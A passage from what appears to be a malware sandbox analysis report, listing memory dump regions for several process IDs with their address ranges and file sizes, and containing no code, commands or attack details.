                                                                                                                                      • memory/2884-150-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        1.5MB

                                                                                                                                      • memory/2884-149-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        1.5MB

                                                                                                                                      • memory/2884-151-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        1.5MB

                                                                                                                                      • memory/2884-196-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        100KB

                                                                                                                                      • memory/2884-155-0x0000000000400000-0x000000000051D000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        1.1MB

                                                                                                                                      • memory/2884-148-0x000000006B440000-0x000000006B4CF000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        572KB

                                                                                                                                      • memory/2936-264-0x00000000029C0000-0x00000000029C1000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        4KB

                                                                                                                                      • memory/2936-263-0x0000000002A00000-0x0000000002A01000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        4KB

                                                                                                                                      • memory/2936-262-0x0000000002990000-0x0000000002991000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        4KB

                                                                                                                                      • memory/2936-268-0x0000000002A20000-0x0000000002A21000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        4KB

                                                                                                                                      • memory/2936-248-0x00000000036B0000-0x00000000036B1000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        4KB

                                                                                                                                      • memory/2936-245-0x00000000027C0000-0x00000000027C1000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        4KB

                                                                                                                                      • memory/2936-258-0x00000000029E0000-0x00000000029E1000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        4KB

                                                                                                                                      • memory/2936-265-0x00000000029B0000-0x00000000029B1000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        4KB

                                                                                                                                      • memory/2936-242-0x00000000024B0000-0x0000000002510000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        384KB

                                                                                                                                      • memory/2936-269-0x00000000029F0000-0x00000000029F1000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        4KB

                                                                                                                                      • memory/2936-270-0x00000000036C0000-0x00000000036C1000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        4KB

                                                                                                                                      • memory/2936-250-0x00000000029D0000-0x00000000029D1000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        4KB

                                                                                                                                      • memory/2936-292-0x0000000000184000-0x0000000000186000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        8KB

                                                                                                                                      • memory/3172-273-0x0000000072870000-0x0000000073020000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        7.7MB

                                                                                                                                      • memory/3172-256-0x0000000000940000-0x0000000000AF4000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        1.7MB

                                                                                                                                      • memory/3172-235-0x0000000000940000-0x0000000000AF4000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        1.7MB

                                                                                                                                      • memory/3172-239-0x00000000773E0000-0x00000000775F5000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        2.1MB

                                                                                                                                      • memory/3172-232-0x00000000028E0000-0x0000000002926000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        280KB

                                                                                                                                      • memory/3172-267-0x0000000002AF0000-0x0000000002AF1000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        4KB

                                                                                                                                      • memory/3172-240-0x0000000000BE0000-0x0000000000BE1000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        4KB

                                                                                                                                      • memory/3172-249-0x0000000073450000-0x00000000734D9000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        548KB

                                                                                                                                      • memory/3172-266-0x0000000003310000-0x0000000003311000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        4KB

                                                                                                                                      • memory/3172-246-0x0000000000940000-0x0000000000AF4000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        1.7MB

                                                                                                                                      • memory/3172-244-0x0000000000940000-0x0000000000AF4000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        1.7MB

                                                                                                                                      • memory/3172-233-0x0000000000930000-0x0000000000931000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        4KB

                                                                                                                                      • memory/3660-281-0x0000000000184000-0x0000000000186000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        8KB

                                                                                                                                      • memory/3660-253-0x0000000002540000-0x0000000002541000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        4KB

                                                                                                                                      • memory/3660-300-0x0000000002420000-0x0000000002480000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        384KB

                                                                                                                                      • memory/3724-255-0x0000000003690000-0x0000000003691000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        4KB

                                                                                                                                      • memory/3736-297-0x0000000000184000-0x0000000000186000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        8KB

                                                                                                                                      • memory/3876-243-0x00000000024B0000-0x0000000002510000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        384KB

                                                                                                                                      • memory/3876-275-0x0000000000184000-0x0000000000186000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        8KB

                                                                                                                                      • memory/3876-252-0x0000000002750000-0x0000000002751000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        4KB

                                                                                                                                      • memory/3876-251-0x0000000002750000-0x0000000002751000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        4KB

                                                                                                                                      • memory/4088-175-0x0000000000630000-0x0000000000638000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        32KB

                                                                                                                                      • memory/4088-201-0x00007FF875570000-0x00007FF876031000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        10.8MB

                                                                                                                                      • memory/4088-203-0x000000001BEB0000-0x000000001BEB2000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        8KB

                                                                                                                                      • memory/4184-198-0x0000000000A92000-0x0000000000AF6000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        400KB

                                                                                                                                      • memory/4184-199-0x0000000000B80000-0x0000000000C1D000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        628KB

                                                                                                                                      • memory/4184-200-0x0000000000400000-0x00000000008F2000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        4.9MB

                                                                                                                                      • memory/4184-171-0x0000000000A92000-0x0000000000AF6000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        400KB

                                                                                                                                      • memory/4492-276-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        128KB

                                                                                                                                      • memory/4532-238-0x0000000000770000-0x00000000007D0000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        384KB

                                                                                                                                      • memory/4632-183-0x00007FF875570000-0x00007FF876031000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        10.8MB

                                                                                                                                      • memory/4632-177-0x0000000000F60000-0x0000000000F8E000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        184KB

                                                                                                                                      • memory/4836-257-0x000000000063D000-0x0000000000664000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        156KB

                                                                                                                                      • memory/4836-259-0x000000000063D000-0x0000000000664000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        156KB

                                                                                                                                      • memory/4836-261-0x0000000000400000-0x000000000048C000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        560KB

                                                                                                                                      • memory/4836-260-0x00000000020C0000-0x0000000002104000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        272KB

                                                                                                                                      • memory/4840-272-0x0000000004BB0000-0x0000000004BB1000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        4KB

                                                                                                                                      • memory/4840-241-0x0000000000390000-0x00000000003BC000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        176KB

                                                                                                                                      • memory/4840-254-0x0000000072870000-0x0000000073020000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        7.7MB

                                                                                                                                      • memory/4848-303-0x0000000072870000-0x0000000073020000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        7.7MB

                                                                                                                                      • memory/4848-279-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        128KB

                                                                                                                                      • memory/4972-284-0x0000000010000000-0x0000000010D56000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        13.3MB

                                                                                                                                      • memory/5016-296-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        128KB

                                                                                                                                      • memory/5116-288-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                        Filesize

                                                                                                                                        128KB